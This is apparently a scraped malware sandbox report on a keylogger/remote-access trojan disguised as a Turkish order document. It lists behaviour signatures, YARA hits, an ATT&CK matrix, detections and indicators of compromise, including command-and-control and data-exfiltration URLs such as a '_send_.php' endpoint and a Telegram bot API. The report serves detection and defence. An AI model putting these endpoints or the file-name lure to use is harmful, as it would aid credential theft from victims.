                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4b95e00.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.9cd0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.9cd0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4b95e00.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1444231240.0000000009CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7696, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7696, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7696, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4b95e00.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.9cd0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.9cd0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4b95e00.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1444231240.0000000009CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7696, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7696, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      111
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping21
                      Security Software Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                      Obfuscated Files or Information
                      LSA Secrets1
                      System Network Configuration Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                      Software Packing
                      Cached Domain Credentials1
                      File and Directory Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSync12
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe42%ReversingLabsByteCode-MSIL.Trojan.XWorm
                      fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe100%AviraHEUR/AGEN.1309493
                      fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://anotherarmy.dns.army:8081100%Avira URL Cloudphishing
                      http://aborters.duckdns.org:8081100%Avira URL Cloudphishing
                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
                      http://varders.kozow.com:8081100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      checkip.dyndns.com
                      132.226.8.169
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://aborters.duckdns.org:8081fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://upx.sf.netAmcache.hve.12.drfalse
                              high
                              http://checkip.dyndns.orgfiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003307000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.comfiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003307000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botfiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1434287481.000000000372C000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://anotherarmy.dns.army:8081fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://varders.kozow.com:8081fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1631438046.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://checkip.dyndns.org/qfiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        high
                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedfiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://reallyfreegeoip.org/xml/fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          132.226.8.169
                                          checkip.dyndns.comUnited States
                                          16989UTMEMUSfalse
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1586806
                                          Start date and time:2025-01-09 16:39:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 15s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:17
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                                          renamed because original name is a hash value
                                          Original Sample Name:fiyati_teklif 615TBI507_ ACCADO san tic_ Siparii jpeg docx .exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@9/11@1/1
                                          EGA Information:
                                          • Successful, ratio: 50%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 56
                                          • Number of non-executed functions: 30
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.42.73.29, 23.56.254.164, 52.149.20.212, 20.190.159.23
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, PID 7696 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • VT rate limit hit for: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                                          TimeTypeDescription
                                          10:40:01API Interceptor1x Sleep call for process: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe modified
                                          10:40:03API Interceptor9x Sleep call for process: powershell.exe modified
                                          10:40:23API Interceptor1x Sleep call for process: WerFault.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          132.226.8.169CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                          • checkip.dyndns.org/
                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                          • checkip.dyndns.org/
                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • checkip.dyndns.org/
